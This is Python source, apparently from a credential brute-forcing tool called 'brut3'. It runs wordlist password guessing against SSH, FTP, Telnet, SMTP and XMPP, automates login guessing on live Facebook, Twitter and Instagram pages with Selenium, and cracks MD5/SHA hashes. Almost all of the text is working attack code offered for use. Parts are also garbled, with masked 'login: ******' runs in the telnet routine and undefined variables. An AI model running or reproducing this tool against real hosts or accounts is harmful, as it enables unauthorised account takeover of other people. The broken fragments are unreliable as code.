def telnetBruteforce(self, address, username, wordlist, port, delay): telnet = telnetlib.Telnet(address) telnet.read_until("login: "******"\n") try: telnet.write(username + "\n") telnet.read_until("Password: "******"\n") tn.write("vt100\n") colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password)) telnet.close() wordlist.close() exit(0) except socket.error: colors.error("[!] Error: Connection Failed. [!]") except KeyboardInterrupt: telnet.close() wordlist.close() exit(1) except EOFError: colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password)) time.sleep(delay) except Exception as e: colors.error("Error caught! Name: {}".format(e))
def execute(self): print(P, "[*] Checking if username exists...", W) if self.usercheck(self.username, self.service) == 1: colors.error("[!] The username was not found! Exiting...") exit() colors.good("[*] Username found! Continuing...") sleep(1) print("Using {} seconds of delay. Default is 1 second".format( self.delay)) self.webBruteforce(self.username, self.wordlist, self.service, self.delay)
def ftpBruteforce(self, address, username, wordlist, port, delay): wordlist = open(wordlist, 'r') ftp = ftplib.FTP() for i in wordlist.readlines(): password = i.strip("\n") try: ftp.connect(address, port) ftp.login(username, password) colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password)) ftp.quit() wordlist.close() exit(0) except ftplib.error_perm: colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password)) time.sleep(delay) except ftplib.all_errors as e: colors.error("Error caught! {}".format(e)) except KeyboardInterrupt: ftp.quit() wordlist.close() exit(1)
def sshBruteforce(self, address, username, wordlist, port, delay): wordlist = open(wordlist, 'r') # Processing wordlist... for i in wordlist.readlines(): password = i.strip("\n") try: response = self.ssh_connect(address, username, password, port) if response == 0: colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password)) elif response == 1: colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password)) time.sleep(delay) elif response == 2: colors.error("[!] Error: Connection couldn't be established to address. Check if host is correct, or up! [!]") exit(1) except Exception as e: colors.error("Error caught! {}".format(e)) pass except KeyboardInterrupt: exit(1) wordlist.close()
def xmppBruteforce(self, address, username, wordlist, port, delay): wordlist = open(wordlist, 'r') client = Client(str(address)) client.connect(server=(str(address), port)) for i in wordlist.readlines(): password = i.strip("\n") try: if client.auth(username, password): client.sendInitPresence() colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password)) client.disconnect() wordlist.close() exit(0) except Exception as e: colors.error("Error caught! Name: {}".format(e)) except KeyboardInterrupt: client.disconnect() wordlist.close() exit(1) except: colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password)) time.sleep(delay)
def smtpBruteforce(self, address, username, wordlist, delay, port): wordlist = open(wordlist, 'r') s = smtplib.SMTP(str(address), port) for i in wordlist.readlines(): password = i.strip("\n") try: s.ehlo() s.starttls() s.ehlo s.login(str(username), str(password)) colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password)) s.close() wordlist.close() exit(0) except smtplib.SMTPAuthenticationError: colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password)) time.sleep(delay) except Exception as e: colors.error("Error caught! %s".format(e)) except KeyboardInterrupt: s.close() wordlist.close() exit(1)
def main(): print(""" _ _ _____ | |__ _ __ _ _| |_|___ / | '_ \| '__| | | | __| |_ \ | |_) | | | |_| | |_ ___) | |_.__/|_| \__,_|\__|____/ security-oriented bruteforce tool. """) parser = argparse.ArgumentParser( description='Bruteforce framework written in Python') required = parser.add_argument_group('required arguments') required.add_argument('-s', '--service', dest='service', help="Provide a service being attacked.\ The Protocols and Services supported are SSH, FTP, SMTP, XMPP, TELNET, INSTAGRAM, FACEBOOK, TWITTER, MD5, SHA1, SHA224" ,\ metavar='', choices=['ssh', 'ftp', 'smtp', 'xmpp', 'telnet', 'instagram', 'facebook', 'twitter', 'md5', 'sha1', 'sha224']) required.add_argument( '-u', '--username', dest='username', help= 'Provide a valid username/hashstring for service/protocol/hashcrack being executed' ) required.add_argument('-w', '--wordlist', dest='wordlist', help='Provide a wordlist or directory to a wordlist') parser.add_argument( '-a', '--address', dest='address', help= 'Provide host address for specified service. Required for certain protocols' ) parser.add_argument( '-p', '--port', type=int, dest='port', help= 'Provide port for host address for specified service. If not specified, will be automatically set' ) parser.add_argument( '-d', '--delay', type=int, dest='delay', help= 'Provide the number of seconds the program delays as each password is tried' ) args = parser.parse_args() # Specify mandatory options. man_options = ['username', 'wordlist'] for m in man_options: if not args.__dict__[m]: parser.print_help() colors.error( "[!] You have to specify a username AND a wordlist! [!]") exit(1) # Detect if service arg is provided if args.service is None: colors.error("[!] No service provided! [!]") exit(1) # Detect is wordlist path is correct if os.path.exists(args.wordlist) == False: colors.error("[!] Wordlist not found! [!]") exit(1) # Check if the service provided is for hashcracking. if args.service in HASHCRACK: colors.warn("[!] Hashcrack detected! [!]") colors.good("[*] Hashstring: {}".format(args.username)) else: colors.good("[*] Username: {}".format(args.username)) time.sleep(0.5) colors.good("[*] Wordlist: {}".format(args.wordlist)) time.sleep(0.5) print(C + "[*] Service: {}".format(arg.service) + W) if args.delay is None: colors.warn("[?] Delay not set! Default to 1 [?]") args.delay = 1 time.sleep(0.5) # main program execution if args.service in colors.PROTOCOLS: # perform protocol-based bruteforce p = protocols.ProtocolBruteforce(args.service, args.address, args.username, args.wordlist, args.port, args.delay) p.execute() elif args.service in colors.WEB: # Web services do not require addresses or ports if args.address or args.port: colors.error( "[!] NOTE: You don't need to provide an address OR port [!]") exit(1) # perform web-based bruteforce w = web.WebBruteforce(args.service, args.username, args.wordlist, args.delay) w.execute() elif args.service in colors.HASHCRACK: # Hashcrack does not require address or port if args.address or args.port: colors.error( "[!] NOTE: You don't need to provide an address OR port [!]") exit(1) # perform hashcracking h = hashcrack.HashCrack(args.service, args.username, args.wordlist, args.delay) h.execute()
def webBruteforce(self, username, wordlist, service, delay): driver = webdriver.Firefox() if service == "facebook": driver.get("https://touch.facebook.com/login?soft=auth/") elif service == "twitter": driver.get("https://mobile.twitter.com/session/new") elif service == "instagram": driver.get("https://www.instagram.com/accounts/login/") wordlist = open(wordlist, 'r') for i in wordlist.readlines(): password = i.strip("\n") try: sleep(2) # wait for all elements to load # Find username element dependent on service if service == "facebook": elem = driver.find_element_by_name("email") elif service == "twitter": elem = driver.find_element_by_name( "session[username_or_email]") elif service == "instagram": elem = driver.find_element_by_name("username") elem.clear() elem.send_keys(username) # Find password element dependent on service if service == "facebook": try: elem = driver.find_element_by_name("pass") except NoSuchElementException: elem.send_keys(Keys.RETURN) elem = driver.find_element_by_name("pass") elif service == "twitter": elem = driver.find_element_by_name("session[password]") elif service == "instagram": elem = driver.find_element_by_name("password") elem.clear() elem.send_keys(password) elem.send_keys(Keys.RETURN) sleep( delay ) # need to wait for page to load, sleep for delay seconds. # Check for changes in driver.title if service == "facebook": assert (("Log into Facebook | Facebook") in driver.title) elif service == "twitter": assert (("Twitter") in driver.title) elif service == "instagram": assert (("Instagram") in driver.title) colors.warn( "[*] Username: {} | [*] Password: {} | Incorrect!\n". format(username, password)) sleep(delay) except AssertionError: # AssertionError: successful login, since we do not see the string in the title, meaning # that the page has changed. colors.good( "[*] Username: {} | [*] Password found: {}\n".format( username, password)) exit(0) except Exception as e: colors.error("Error caught! {}".format(e)) exit(1)